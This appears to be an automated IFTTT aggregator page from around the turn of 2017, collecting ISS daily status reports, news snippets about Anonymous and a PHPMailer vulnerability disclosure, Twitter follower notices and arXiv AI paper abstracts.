investigation studies how fine motor skills are effected by long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. The goal of Fine Motor Skills is to answer how fine motor performance in microgravity trend/vary over the duration of a six-month and year-long space mission; how fine motor performance on orbit compare with that of a closely matched participant on Earth; and how performance trend/vary before and after gravitational transitions, including the periods of early flight adaptation, and very early/near immediate post-flight periods.  Aerosol Sampler: Today the crew closed the final collection surfaces on the Passive Aerosol Sampler (PAS).  The PAS was designed with individual drawer-like collection surfaces covered with sticky carbon tape which are open to ISS air for 5 different exposure durations (2, 4, 8, 16 and 32 days). PAS are mounted on the edge of air vents where the drawers directly intercept the air pulled into the ISS ventilation system. These vents often have a build-up of dust that is removed in weekly vacuuming chores, so depending on the sampling location, the longer duration samples are expected to contain visible amounts of airborne debris. Today’s Planned Activities All activities were completed unless otherwise noted. Extravehicular Activity (EVA) Reminder for On-Orbit Fitcheck Verification (OFV) Measurements Extravehicular Activity (EVA) Reminder for On-Orbit Fitcheck Verification (OFV) Daily Planning Conference ISS crew and ГОГУ (RSA Flight Control Management Team) weekly conference (S-band) Fluid Shifts Ultrasound 2 HRF Rack 1 Power On Fine Motor Skills Experiment Test – Subject Equipment Setup and Activation for MPEG2 TV coverage via Ku-band.  Environmental Health System (EHS) Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis Fluid Shifts OCT Baseline Setup Combustion Integrated Rack Hardware Return Crew Preparation for PAO Event Crew Medical Officer (CMO) On Board Training (OBT) Public Affairs Office (PAO)  New Year Event Dose Tracker Data Entry Subject Fluid Shifts CDL Holter Arterial BP Hardware Don – Subject Deactivation of КСПЭ Equipment and closing applications on CP SSC after TV conference CARDIOVECTOR. Experiment Ops  Fluid Shifts Ultrasound Baseline Scan – Subject СОЖ Maintenance Fluid Shifts Ultrasound Baseline Scan – Operator UDOD. Experiment Ops with DYKNANIYE-1 and SPRUT-2 Sets. USOS Window Shutter Close iPad procedure test for working with r/g. Fluid Shifts OCT Baseline Exam – Operator Fluid Shifts DPOAE Baseline Test – Subject Fluid Shifts OCT Baseline Stow Photo TV GoPro Battery Charging Extravehicular Activity (EVA) Equipment Lock Preparation Part 1 Fluid Shifts Tonometry Baseline Setup Fluid Shifts Tonometry Baseline Exam – Operator Photographing БД-2 limit switch and file Fluid Shifts Tonometry Baseline Exam – Subject Fluid Shifts CDL Holter Arterial BP Hardware Doff Alternate – Subject Fluid Shifts Tonometry Baseline Stow Space Headaches – Weekly Questionnaire Extravehicular Mobility Unit (EMU) On-orbit Fitcheck Verification Inventory Management System (IMS) Tagup (S-band) Замена ПУРВ-К (А308) (№10322900) на ПУРВ-К (А308) (№10326332) и установка кабель-вставки. NAPOR-mini RSA. Cleaning Onboard Memory Storage БЗУ-М vents Preventive Maintenance of FS1 Laptop БРИ monthly cleaning. MRM2 comm config to support the P/L Ops Kulonovskiy Kristall Experiment Run. MRM2 Comm Reconfig for Nominal Ops Initiate water transfer from CWC-I to ЕДВ KULONOVSKIY KRISTALL. Copy Data Terminate water transfer from CWC-I to ЕДВ Aerosol Passive Samplers Hardware Stowage IMS Update VEG-03 Hardware Deactivation Dose Tracker Data Entry Subject INTERACTION-2. Experiment Ops Environmental Health System (EHS) Total Organic Carbon Analyzer (TOCA) Sample Data Record Habitability Human Factors Directed Observations – Subject Habitability Walk-through Video – Subject Completed Task List Items Fluid Shifts Hardware Gather PMA1 IMV Cone Screen Cleaning Manufacturing Device Print Removal, Clean and Stow SSLA Installation – Node 1 (Qty 3) NOD1OP2-1 NOD1OP4 NOD1OS2-1  Ground Activities All activities were completed unless otherwise noted. S4 Battery Drain Nitrogen Distribution System Leak Check  Three-Day Look Ahead: Saturday, 12/31:  Crew off duty, Housekeeping Sunday, 01/01: Crew Off Duty Monday, 1/02:  Crew Off Duty  QUICK ISS Status – Environmental Control Group:     Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off          [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up

from ISS On-Orbit Status Report http://ift.tt/2hNintT
via IFTTT

ISS Daily Summary Report – 12/29/2016

Fluid Shifts – Baseline Imaging: The first of three 49Soyuz subjects performed their Baseline Imaging measurements with assistance from both onboard operators and ground remote guiders.  Ultrasound imaging was taken of arterial and venous measures of the head and neck, cardiac, ophthalmic and portal vein, and tissue thickness of lower and upper body. Additional measurements using the Cerebral and Cochlear Fluid Pressure (CCFP), Distortion Product Otoacoustic Emissions (DPOAE), Optical Coherence Tomography (OCT), ESA’s Cardiolab (CDL) Holter Arterial Blood Pressure Device, and Intraocular Pressure (IOP) using the tonometer were taken as well. Fluid Shifts is a joint NASA-Russian experiment that investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is investigated as a possible intervention. Results from this study may help to develop preventative measures against lasting changes in vision and eye damage. Combustion Integration Rack (CIR) Optics Bench Configuration, Part 2: The crew continued the preparation for the Cool Flames Investigation (CFI) experiment by completing the reconfiguration and installation of the Optics Bench on the CIR.  The Hi Bit-depth Multi-Spectral (HiBMS) Imaging packages on Universal Mounting Locations 7 and 8 (ULM7 & ULM8). Ground teams are still evaluating how to remove the stuck FLame EXtinguishment (FLEX)-2 Multi-user Droplet Combustion Apparatus (MDCA) trapped within the Chamber Insert Assembly (CIA) of the CIR.  Once removed the MDCA will be reconfigured for CFI. CFI provides new insight into the phenomenon where some types of fuels initially burn very hot, then appear to go out — but they continue burning at a much lower temperature, with no visible flames (cool flames). Understanding cool flame combustion helps scientists develop new engines and fuels that are more efficient and less harmful to the environment. ISS Safety Video Survey:  The crew recorded video of the interior volume of the ISS to allow ground teams to assess the current vehicle configuration and identify any safety concern. This survey is performed approximately every 6 months to identify ventilation blockage, flammability hazards, verify emergency egress paths, and confirm access to fire ports and safety equipment. Extravehicular Mobility Unit (EMU) Water Conductivity Test: Today, the crew tested the conductivity of water samples obtained earlier this week from EMU 3008. Extravehicular Activity (EVA) Preparations:  The crew continued with preparations for the Battery Upgrade EVA. Today, the crew utilized Dynamic Onboard Ubiquitous Graphics (DOUG) Software to review the translation paths during the upcoming EVAs, followed by a conference with ground specialists to answer any questions. Ground teams continue to monitor the discharge of the Channel 3A batteries.  The first of the two EVAs to replace the Channel 1A/3A batteries is scheduled Friday, January 9th.  Mobile Servicing System (MSS) Operations:  Last night ground specialist powered up the MSS and maneuvered the Special Purpose Dexterous Manipulator (SPDM) Body and Arm1 in order to grasp Robot Micro Conical Tool 2 (RMCT2) in the SPDM Tool Holder Assembly (THA).  SPDM Arm1 was then powered down and powered up back again and the Robotics Ground Controllers confirmed that the SPDM Orbital Replaceable Unit (ORU) Tool Changeout Mechanism 1 (OTCM1) Payload Status was still Secure.  This verified that the SPDM software update uplinked overnight corrected the anomaly where after power up of a loaded OTCM it no longer had a Payload Status of Secure.  RMCT2 was then released and SPDM Arm1 and the SPDM Body were then reconfigured for the start of the Battery replacement operations scheduled to start on GMT 366.  MSS performance today was nominal.  Today’s Planned Activities All activities were completed unless otherwise noted. Combustion Integrated Rack Doors Open Fluid Shifts Urine Collection Stow Hardware Setup and Connection for TV Greetings in MPEG2 via Ku-band. Combustion Integrated Rack Optics Bench Configuration 2 Crew Prep for PAO Fluid Shifts Ultrasound 2 HRF Rack 1 Power On Fluid Shifts OCT Baseline Setup Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Public Affairs Office (PAO) Event using MPEG Fine Motor Skills Experiment Test – Subject Fluid Shifts CDL Holter Arterial BP Hardware Don – Subject Deactivation of КСПЭ Hardware and Closing Applications on the Central Post SSC after the TV Session Hardware Prep for Spacesuit #5 Functionality Check. Fluid Shifts Ultrasound Baseline Scan – Subject Spacesuit #5 Activation. PELIKAN. FSS Batteries Charge (start) Degassing of Spacesuit #5 Water System, [КВО] LCG and БСС interface unit in ПхО. Partial Pressure СО check on the Central Post with CSA-CP  СОЖ Maintenance Leak Check of Spacesuit #5 Secondary Bladder. Fluid Shifts CCFP Baseline Test – Subject Leak Check of Spacesuit #5, Onboard Interface Unit (БСС), and Spacesuit Valves. Combustion Integrated Rack Optics Bench Translation In PELIKAN. Observation and Photography using FSS Hardware Fluid Shifts OCT Baseline Exam – Subject Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Combustion Integrated Rack Optics Bench Configuration 3 Fluid Shifts DPOAE Baseline Test – Subject Fluid Shifts OCT Baseline Stow Spacesuit #5 Prep for telemetry checks. Fluid Shifts Tonometry Baseline Setup Combustion Integrated Rack Rack Doors Close Cleaning of the Screen of Fan Unit with Heater (БВН) in Soyuz 732 Fluid Shifts Tonometry Baseline Exam – Operator ИП-1 Sensors Deployment Monitoring Fluid Shifts Tonometry Baseline Exam – Subject Fluid Shifts CDL Holter Arterial BP Hardware Doff Alternate – Subject Fluid Shifts Tonometry Baseline Stow Portable Onboard Computers (POC) Dynamic Onboard Ubiquitous Graphics (DOUG) Software Review COSMOCARD. Closeout Operations Comm Setup and Transit-B Activation Packed Bed Reactor Experiment Lab Video Setup ESA Weekly crew conference Photo and Video of Life on the ISS Checking the Systems of Spacesuit #5, БСС, and Comm Assets Restoration of Nominal Comm Config Switching Spacesuit #5 and БСС to Stow Mode. Extravehicular Mobility Unit (EMU) Conductivity Test Hardware Restow after Spacesuit #5 Check Soyuz 732 Samsung Tablet Charging (if the charge is less than 80%) IMS Delta File Prep ISS SAFETY VIDEO Extravehicular Activity (EVA) Procedure Conference Packed Bed Reactor Experiment Lab Video Return Flight Director/ISS CREW CONFERENCE Stow Syringes used […]

from ISS On-Orbit Status Report http://ift.tt/2hNJWSf
via IFTTT

Anonymous Hackers Deface Victoria's Human Rights Commission Website

Hackers claiming to be part of Anonymous defaced the website of Victoria's Human Rights Commission.

from Google Alert - anonymous http://ift.tt/2i5PgxP
via IFTTT

Critical Updates — RCE Flaws Found in SwiftMailer, PhpMailer and ZendMail

A security researcher recently reported a critical vulnerability in one of the most popular open source PHP libraries used to send emails that allowed a remote attacker to execute arbitrary code in the context of the web server and compromise a web application. Disclosed by Polish security researcher Dawid Golunski of Legal Hackers, the issue (CVE-2016-10033) in PHPMailer used by more than 9


from The Hacker News http://ift.tt/2iZIWbt
via IFTTT

Cantates et arias italiennes pour voix de basse (Anonymous)

Cantates et arias italiennes pour voix de basse (Anonymous). (Redirected from Cantates et arias italiennes pour voix de basse (BnF RES VMD ...

from Google Alert - anonymous http://ift.tt/2hK7OCU
via IFTTT

BHIM App — How to Send & Receive Money with UPI

After the lack of supply of cash in India following its Prime Minister step to remove high-denomination banknotes from circulation in November 2016, the country is moving a step closer towards becoming a cashless economy with the launch of Unified Payment Interface (UPI). Unified Payment Interface (UPI) allows all bank account holders to pay money from their smartphones, both online and


from The Hacker News http://ift.tt/2hMieqw
via IFTTT

I have a new follower on Twitter


Stephanie Diamond
Started at AOL in '94 and watched the world change and change...Author of Content Marketing Strategies For Dummies and 8+ other marketing books
New York
http://t.co/TcSXzHpzB7
Following: 24053 - Followers: 29565

January 03, 2017 at 12:55AM via Twitter http://twitter.com/diamondsf

I have a new follower on Twitter


Sonny Vu
Philomath, dad, husband, believer. Have a thing for #languages #hardtech #brands.
Ho Chi Minh, Vietnam

Following: 478 - Followers: 27505

January 03, 2017 at 12:44AM via Twitter http://twitter.com/sonnyvu

Anonymous

One of the most high-profile hacktivist collectives in the world, Anonymous has demonstrated a real ability to influence opinion.

from Google Alert - anonymous http://ift.tt/2hMa959
via IFTTT

Monday, January 2, 2017

Hello @anonymous … we have been part of the revolution for nearly 50 years.

hello @anonymous … we have been part of the revolution for nearly 50 years.. we sing this on @anonymousIRC every daY. Posted on Tuesday ...

from Google Alert - anonymous http://ift.tt/2ixlVxl
via IFTTT

I have a new follower on Twitter


David Reske
Founder and CEO @Nowspeed, Internet Marketing Veteran, Social Media, SEO, PPC, Website Optimization, Father, Sailor, Traveler
Boston, MA
http://t.co/ML1tCmkzoC
Following: 21899 - Followers: 24108

January 02, 2017 at 10:18PM via Twitter http://twitter.com/davidreske

I have a new follower on Twitter


Chris Kirksey
CEO @directionllc with a passion for life, family, friends, motivation, success, helping businesses w/ SEO, Web Design & Digital Marketing. Believer & Army Vet
Augusta, GA
https://t.co/28qXJazD21
Following: 1292 - Followers: 1553

January 02, 2017 at 10:18PM via Twitter http://twitter.com/SuperChrisK

I have a new follower on Twitter


Lisa Danforth
Business Strategist & Coach for Women Entrepreneurs. I teach women how to earn more & work less through mindset, business strategy and sustainable action plan.
Vermont
https://t.co/uc62j9Jkj9
Following: 1429 - Followers: 1743

January 02, 2017 at 09:53PM via Twitter http://twitter.com/lisadanforth1

Anonymous even Braveheart helped us

Even Braveheart helped us being anonymous …what will you do without freedom? for just one more day. Posted on Tuesday, January 3rd, 2017 at ...

from Google Alert - anonymous http://ift.tt/2j23cwX
via IFTTT

I have a new follower on Twitter


Marius
From Paris, interested in AI and future in general
Paris

Following: 334 - Followers: 43

January 02, 2017 at 09:18PM via Twitter http://twitter.com/marius5141

Digital Advertising Traffic Operation: Machine Learning for Process Discovery. (arXiv:1701.00001v1 [cs.CY])

In a Web Advertising Traffic Operation it's necessary to manage the day-to-day trafficking, pacing and optimization of digital and paid social campaigns. The data analyst on Traffic Operation can not only quickly provide answers but also speaks the language of the Process Manager and visually displays the discovered process problems. In order to solve a growing number of complaints in the customer service process, the weaknesses in the process itself must be identified and communicated to the department. With the help of Process Mining for the CRM data it is possible to identify unwanted loops and delays in the process. With this paper we propose a process discovery based on Machine Learning technique to automatically discover variations and detect at first glance what the problem is, and undertake corrective measures.



from cs.AI updates on arXiv.org http://ift.tt/2iCp4hK
via IFTTT

Non-Negative Matrix Factorization Test Cases. (arXiv:1701.00016v1 [math.NA])

Non-negative matrix factorization (NMF) is a prob- lem with many applications, ranging from facial recognition to document clustering. However, due to the variety of algorithms that solve NMF, the randomness involved in these algorithms, and the somewhat subjective nature of the problem, there is no clear "correct answer" to any particular NMF problem, and as a result, it can be hard to test new algorithms. This paper suggests some test cases for NMF algorithms derived from matrices with enumerable exact non-negative factorizations and perturbations of these matrices. Three algorithms using widely divergent approaches to NMF all give similar solutions over these test cases, suggesting that these test cases could be used as test cases for implementations of these existing NMF algorithms as well as potentially new NMF algorithms. This paper also describes how the proposed test cases could be used in practice.



from cs.AI updates on arXiv.org http://ift.tt/2iJ2otG
via IFTTT

Learning Weighted Association Rules in Human Phenotype Ontology. (arXiv:1701.00077v1 [q-bio.QM])

The Human Phenotype Ontology (HPO) is a structured repository of concepts (HPO Terms) that are associated to one or more diseases. The process of association is referred to as annotation. The relevance and the specificity of both HPO terms and annotations are evaluated by a measure defined as Information Content (IC). The analysis of annotated data is thus an important challenge for bioinformatics. There exist different approaches of analysis. From those, the use of Association Rules (AR) may provide useful knowledge, and it has been used in some applications, e.g. improving the quality of annotations. Nevertheless classical association rules algorithms do not take into account the source of annotation nor the importance yielding to the generation of candidate rules with low IC. This paper presents HPO-Miner (Human Phenotype Ontology-based Weighted Association Rules) a methodology for extracting Weighted Association Rules. HPO-Miner can extract relevant rules from a biological point of view. A case study on using of HPO-Miner on publicly available HPO annotation datasets is used to demonstrate the effectiveness of our methodology.



from cs.AI updates on arXiv.org http://ift.tt/2hLjytP
via IFTTT

RNN-based Encoder-decoder Approach with Word Frequency Estimation. (arXiv:1701.00138v1 [cs.CL])

This paper tackles the reduction of redundant repeating generation that is often observed in RNN-based encoder-decoder models. Our basic idea is to jointly estimate the upper-bound frequency of each target vocabulary in the encoder and control the output words based on the estimation in the decoder. Our method shows significant improvement over a strong RNN-based encoder-decoder baseline and achieved its best results on an abstractive summarization benchmark.



from cs.AI updates on arXiv.org http://ift.tt/2iJg8Vk
via IFTTT

Lazily Adapted Constant Kinky Inference for Nonparametric Regression and Model-Reference Adaptive Control. (arXiv:1701.00178v1 [math.OC])

Techniques known as Nonlinear Set Membership prediction, Lipschitz Interpolation or Kinky Inference are approaches to machine learning that utilise presupposed Lipschitz properties to compute inferences over unobserved function values. Provided a bound on the true best Lipschitz constant of the target function is known a priori they offer convergence guarantees as well as bounds around the predictions. Considering a more general setting that builds on Hoelder continuity relative to pseudo-metrics, we propose an online method for estimating the Hoelder constant online from function value observations that possibly are corrupted by bounded observational errors. Utilising this to compute adaptive parameters within a kinky inference rule gives rise to a nonparametric machine learning method, for which we establish strong universal approximation guarantees. That is, we show that our prediction rule can learn any continuous function in the limit of increasingly dense data to within a worst-case error bound that depends on the level of observational uncertainty. We apply our method in the context of nonparametric model-reference adaptive control (MRAC). Across a range of simulated aircraft roll-dynamics and performance metrics our approach outperforms recently proposed alternatives that were based on Gaussian processes and RBF-neural networks. For discrete-time systems, we provide stability guarantees for our learning-based controllers both for the batch and the online learning setting.



from cs.AI updates on arXiv.org http://ift.tt/2hLfLg3
via IFTTT

STRIPS Planning in Infinite Domains. (arXiv:1701.00287v1 [cs.AI])

Many practical planning applications involve continuous quantities with non-linear constraints, which cannot be modeled using modern planners that construct a propositional representation. We introduce STRIPStream: an extension of the STRIPS language which supports infinite streams of objects and static predicates and provide two algorithms, which reduce the original problem to a sequence of finite-domain planning problems. The representation and algorithms are entirely domain independent. We demonstrate them on simple illustrative domains, and then on a high-dimensional, continuous robotic task and motion planning problem.



from cs.AI updates on arXiv.org http://ift.tt/2iJ8ZEk
via IFTTT

An affective computational model for machine consciousness. (arXiv:1701.00349v1 [cs.AI])

In the past, several models of consciousness have become popular and have led to the development of models for machine consciousness with varying degrees of success and challenges for simulation and implementations. Moreover, affective computing attributes that involve emotions, behavior and personality have not been the focus of models of consciousness as they lacked motivation for deployment in software applications and robots. The affective attributes are important factors for the future of machine consciousness with the rise of technologies that can assist humans. Personality and affection hence can give an additional flavor for the computational model of consciousness in humanoid robotics. Recent advances in areas of machine learning with a focus on deep learning can further help in developing aspects of machine consciousness in areas that can better replicate human sensory perceptions such as speech recognition and vision. With such advancements, one encounters further challenges in developing models that can synchronize different aspects of affective computing. In this paper, we review some existing models of consciousnesses and present an affective computational model that would enable the human touch and feel for robotic systems.



from cs.AI updates on arXiv.org http://ift.tt/2hLmjLu
via IFTTT